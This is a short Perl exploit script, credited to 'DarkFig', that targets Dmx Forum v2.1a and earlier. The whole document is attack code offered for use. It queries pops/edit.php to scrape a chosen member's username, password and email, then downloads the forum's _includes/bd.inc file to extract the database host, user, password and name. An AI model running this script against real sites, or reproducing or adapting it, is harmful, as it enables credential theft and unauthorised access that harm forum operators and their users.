#!/usr/bin/perl # # by DarkFig -- www.acid-root.new.fr # use LWP::Simple; if ( !$ARGV[1] ) { header(); print "\n| Usage: ----------------|"; print "\n+------------------------------------------+"; print "\n| Example: http://localhost/dmx/ 1 ------|"; end(); } sub header { print "\n+------------------------------------------+"; print "\n| Dmx Forum <= v2.1a SQL Injection Exploit |"; print "\n+------------------------------------------+"; } sub end { print "\n+------------------------------------------+\n"; exit; } $err0 = "\n[-]Can't connect to the host !"; header(); $url = "$ARGV[0]"."pops/edit.php?membre="."$ARGV[1]"; $req = get($url) or print "$err0"; if( $req =~ /input name="pseudo" type="text" id="pseudo" value="(.*?)"/ ){ print "\n [+]Username: $1"; $req =~ /input name="pwd" type="password" id="pwd" value="(.*?)"/ , print "\n [+]Password: $1"; $req =~ /input name="email" type="text" id="email" value="(.*?)"/ , print "\n [+]Email: $1";} else {print "\n[-]Part 1 failed !";} $url2 = "$ARGV[0]"."_includes/bd.inc"; $req2 = get($url2) or print "$err0"; if($req2 =~ /host = "(.*?)";/) {print "\n[+]DBHOST: $1"; $req2 =~ /user = "(.*?)";/;print "\n[+]DBUSER: $1"; $req2 =~ /pass = "(.*?)";/;print "\n[+]DBPASS: $1"; $req2 =~ /bdd = "(.*?)";/;print "\n[+]DBNAME: $1"; } else {print "\n[-]Part 2 failed !";} end();